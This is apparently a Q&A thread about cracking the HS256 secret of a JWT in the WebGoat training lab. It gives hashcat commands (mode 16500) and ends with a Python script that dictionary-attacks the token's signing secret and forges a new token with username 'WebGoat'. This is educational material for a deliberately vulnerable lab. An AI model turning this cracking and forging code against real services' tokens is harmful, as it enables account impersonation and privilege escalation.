I've recently started to practice my penetration testing skills and I got started with WebGoat.

I got to the "Authentication Bypass" chapter, to the JWT Token cracking. WebGoat presents this JWT Token:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.vPe-qQPOt78zK8wrbN1TjNJj3LeX9Qbch6oo23RUJgM

and asks you to change the username to WebGoat and submit the new JWT token. This means I need to find the secret with which the hash function generates the signature.

In order to do that, WebGoat recommends using HashCat with a 10,000-word list, which I tried to do on my Kali Linux 2018.4 (running in a VMware Player virtual machine) with the command:

$ hashcat -a 0 -m 1450 text.hash /root/wordlists/google-10000-english-master/google-10000-english.txt

Unfortunately, I get this error:

* Device #1: This device's constant buffer size is too small.

* Device #1: This device's local mem size is too small.

No devices found/left.

These are my specs: [screenshot of system specifications]

I supplied the Kali Linux VM with 4 GB RAM and 4 processors.

I just want to solve this stage and move on. I don't mind using any other program that is preinstalled in Kali, and if it's even better than HashCat, then please tell me!

I also don't mind writing the code for brute-forcing myself, but I'm sure it won't be as efficient as what is offered on the internet.

Maxim Shloz (edited by EdOverflow)
  • I searched your errors on Google and got a hit for our site: https://security.stackexchange.com/questions/147397/hashcat-with-kali-2-in-a-vm – schroeder Jan 06 '19 at 21:01
  • I've installed the suggested packages in the link you added, but unfortunately I'm still getting the same error message. I'm applying the --force command, but it doesn't work either (same error). – Maxim Shloz Jan 06 '19 at 21:11
  • The other answers to that question point you to the legacy version or installing on the host machine – schroeder Jan 06 '19 at 21:18
  • Are you sure it's the same kind of error? Because the link you provided has a different kind of error than mine. – Maxim Shloz Jan 06 '19 at 21:20

1 Answer

JWT Token Structure

As detailed on the JWT website (https://jwt.io/introduction/), a JWT token consists of three parts separated by a dot (.): Header, Payload and Signature. Both Header and Payload are Base64 encoded strings.

Therefore a JWT token would typically look like this: Base64(Header).Base64(Payload).Signature

The signature is created by taking both the header and the payload and using a secret key to create a signature with the algorithm specified in the Header.

Finding JWT Secret Key

What you need to do to solve this challenge is to find the secret key that has been used to create the signature. This can be done by using a brute force attack to calculate the signature by using different secret keys either from a wordlist or through a pure brute force attack.

The correct syntax to conduct a brute force attack to find the secret key using Hashcat is:

Using a Wordlist:  
$ hashcat -a0 -m 16500 text.hash [dict]

Pure Brute force attack:  
$ hashcat -a3 -m 16500 text.hash

The option -m 16500 is the correct Hash Mode to brute force JWT tokens using Hashcat. The one that you have used (-m 1450) is for raw HMAC-SHA256 hash and is applied to the whole string, therefore resulting in an error.

The above method works fine for me to find a secret key for a given JWT token, however, I am not able to solve the WebGoat challenge yet. I am trying to get in touch with the Webgoat team to understand the problem and to solve this challenge. I will provide an update when I hear back from them and can solve the challenge.

Vishal
  • But how can you not brute force the signature part? When you change the username to WebGoat in the payload, you need a new signature. – Maxim Shloz Jan 08 '19 at 07:15
  • Yes, you're right. A new valid signature will be required when you change the username. Signatures are created by using one way hash functions. To solve this challenge, you may need to brute force the Secret that will be appended to the payload to create a valid signature after you have changed the username. The following post may provide some useful info: https://stackoverflow.com/questions/27301557/if-you-can-decode-jwt-how-are-they-secure. I will give it a try at my end and post the results if that helps. – Vishal Jan 08 '19 at 11:53
  • Progress: I've installed WebGoat and got to the challenge. There appears to be limited support for cracking JWT tokens. I found one jwt-cracker at https://github.com/brendan-rius/c-jwt-cracker, which seems to be buggy. Found a secret which seems to be incorrect. I also tried hashcat. The following syntax works for JWT tokens: hashcat -a3 -m 16500 data.hash --force [dict]. I'm running this in brute force mode [-a3] for the last few hours and it's still going. Ideally it should not take that long for a training course. I will update on progress again once finished. – Vishal Jan 09 '19 at 11:25
  • @MaximShloz, I have updated the answer above to better reflect the question and to provide an answer to what you are doing wrong here. Hope this helps. – Vishal Jan 18 '19 at 11:26
  • I have finally received a response from the WebGoat team. The wordlist approach is the way to go with one of the well known wordlists at https://github.com/first20hours/google-10000-english. I have tried this and the wordlist 'google-10000-english.txt' has worked for me specifically. – Vishal Feb 02 '19 at 13:44
  • @Vishal - you wrote that c-jwt-cracker seems to be buggy. What exactly was the bug that you experienced? I have just used this tool today. It did not support hashes other than SHA256, might it be the problem, since it now supports SHA384 and SHA512 as well? – Maxim Masiutin Jan 12 '21 at 21:49
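The answer above describes the two halves of the exercise (recover the HS256 secret with a wordlist, then re-sign the payload with the username changed) but does not show the computation itself. The following is an added example, not code from the question, the answer, or WebGoat: it decodes the token from the question, runs the same per-candidate HMAC-SHA256 check that a hashcat -m 16500 wordlist attack performs, and forges a token once a secret is found. The wordlist and the secret "training" are constructed for the demo and are not WebGoat's real secret; the page's token is only decoded here, not cracked.

```python
"""Offline dictionary attack on an HS256 JWT, then forging a token with a changed claim."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_decode(data: str) -> bytes:
    """Decode unpadded base64url as used in JWTs (padding is restored first)."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def b64url_encode(raw: bytes) -> str:
    """Encode to base64url without trailing '=' padding, as JWTs require."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_jwt(token: str):
    """Split a compact JWT into (header dict, payload dict, raw signature bytes)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            b64url_decode(sig_b64))


def hs256_signature(header_b64: str, payload_b64: str, secret: str) -> bytes:
    """HMAC-SHA256 over 'header.payload': the check a wordlist attack repeats per candidate."""
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    return hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate secret whose HS256 signature matches, or None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # only symmetric HMAC secrets can be guessed this way
        raise ValueError(f"not an HS256 token (alg={header.get('alg')!r})")
    target = b64url_decode(sig_b64)
    for candidate in wordlist:
        candidate = candidate.strip()
        if candidate and hs256_signature(header_b64, payload_b64, candidate) == target:
            return candidate
    return None


def sign_jwt(header: dict, payload: dict, secret: str) -> str:
    """Build a compact HS256 JWT; compact JSON separators avoid stray whitespace."""
    header_b64 = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header_b64}.{payload_b64}.{b64url_encode(hs256_signature(header_b64, payload_b64, secret))}"


def forge_jwt(token: str, secret: str, **changed_claims) -> str:
    """Re-sign a token with modified claims once the secret is known."""
    header, payload, _ = decode_jwt(token)
    payload.update(changed_claims)
    return sign_jwt(header, payload, secret)


# Token from the question; it is decoded below but its real secret is not assumed.
WEBGOAT_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19."
    "vPe-qQPOt78zK8wrbN1TjNJj3LeX9Qbch6oo23RUJgM"
)

# Constructed stand-in for google-10000-english.txt and a constructed (hypothetical) secret.
SAMPLE_WORDLIST = ["password", "secret", "letmein", "training", "changeme"]
SAMPLE_SECRET = "training"  # hypothetical; NOT the real WebGoat secret
SAMPLE_TOKEN = sign_jwt(
    {"alg": "HS256", "typ": "JWT"},
    {"iss": "WebGoat Token Builder", "sub": "tom@webgoat.com", "username": "Tom"},
    SAMPLE_SECRET,
)


def demo():
    """Crack the constructed token, forge username=WebGoat, confirm the forgery verifies."""
    secret = crack_hs256(SAMPLE_TOKEN, SAMPLE_WORDLIST)
    forged = forge_jwt(SAMPLE_TOKEN, secret, username="WebGoat")
    _, forged_payload, _ = decode_jwt(forged)
    return secret, forged_payload["username"], crack_hs256(forged, [secret]) == secret


if __name__ == "__main__":
    print(decode_jwt(WEBGOAT_TOKEN)[1])
    print(demo())
```

To run the same attack with hashcat, the hash file for -m 16500 contains the token itself, one per line, and the wordlist is passed as the dictionary; the pure-Python loop above is adequate for a 10,000-word list but far slower than hashcat for mask (-a 3) attacks. Note that crack_hs256 refuses tokens whose alg is not HS256, since an RS256 or ES256 signature cannot be recovered by guessing a passphrase.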